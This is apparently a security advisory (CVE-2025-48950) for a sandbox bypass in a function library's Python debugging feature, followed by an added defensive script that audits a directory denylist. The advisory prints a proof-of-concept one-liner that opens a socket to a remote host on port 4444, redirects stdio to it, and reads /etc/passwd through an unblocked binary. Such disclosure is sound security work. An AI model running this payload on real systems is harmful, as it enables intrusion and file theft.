Python Sandbox Bypass in Function Library

Moderate
baixin513 published GHSA-p2qq-x9j2-px8v Jun 3, 2025

Package

No package listed

Affected versions

<1.10.8-lts

Patched versions

1.10.8-lts

Description

Summary

The sandbox only restricts execution permissions for binary files in common directories, such as /bin, /usr/bin, etc. Attackers can therefore use files that have execute permission in non-blacklisted directories to carry out attacks.

Details

Taking arbitrary file reading as an example: the system's urlget file can be exploited to read arbitrary files. It is used as follows:

/usr/lib/aarch64-linux-gnu/gettext/urlget /etc/passwd /etc/passwd

The sandbox bypass POC:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.28.176",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/usr/lib/aarch64-linux-gnu/gettext/urlget","/etc/passwd","/etc/passwd"]);

Exploit:

  1. The attacker listens on port 4444 locally.
  2. The attacker executes the POC through the function library's debugging function and obtains the file content.

Impact

sandbox bypass
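The gap described in the Summary can be measured from the defender's side. The following is an added example, not code from the advisory or the affected project: it lists the executables a directory denylist still permits and contrasts that check with an explicit allowlist. The denied directories, function names and the sample tree are assumptions constructed for illustration.

```python
import os
import stat

# Assumption: the advisory names only /bin and /usr/bin ("etc."); extend as needed.
DENIED_DIRS = ("/bin", "/usr/bin")


def _inside(path, directory):
    """True if path resolves to a location at or below directory."""
    path, directory = os.path.realpath(path), os.path.realpath(directory)
    return os.path.commonpath([path, directory]) == directory


def denylist_permits(path, denied_dirs=DENIED_DIRS):
    """Directory denylist as the advisory describes it: only listed dirs are blocked."""
    return not any(_inside(path, d) for d in denied_dirs)


def allowlist_permits(path, allowed_files):
    """Hardened alternative: only explicitly approved executables may run."""
    return os.path.realpath(path) in {os.path.realpath(a) for a in allowed_files}


def audit_gap(root, denied_dirs):
    """List executable regular files under root that the denylist still permits."""
    gap = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode
            except OSError:
                continue  # entry vanished or is unreadable
            if stat.S_ISREG(mode) and mode & 0o111 and denylist_permits(full, denied_dirs):
                gap.append(os.path.realpath(full))
    return sorted(gap)


def build_sample_tree(root):
    """Constructed sample layout mirroring the paths named in the advisory."""
    for rel in ("usr/bin/cat", "usr/lib/aarch64-linux-gnu/gettext/urlget"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(full, 0o755)
    return [os.path.join(root, "usr/bin")]  # denied dirs for this sample tree
```

Running `audit_gap("/", DENIED_DIRS)` inside the sandbox image shows how many executables remain reachable; every entry in the result is a candidate for the kind of bypass shown above.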

Severity

Moderate

CVE ID

CVE-2025-48950

Weaknesses

No CWEs

Credits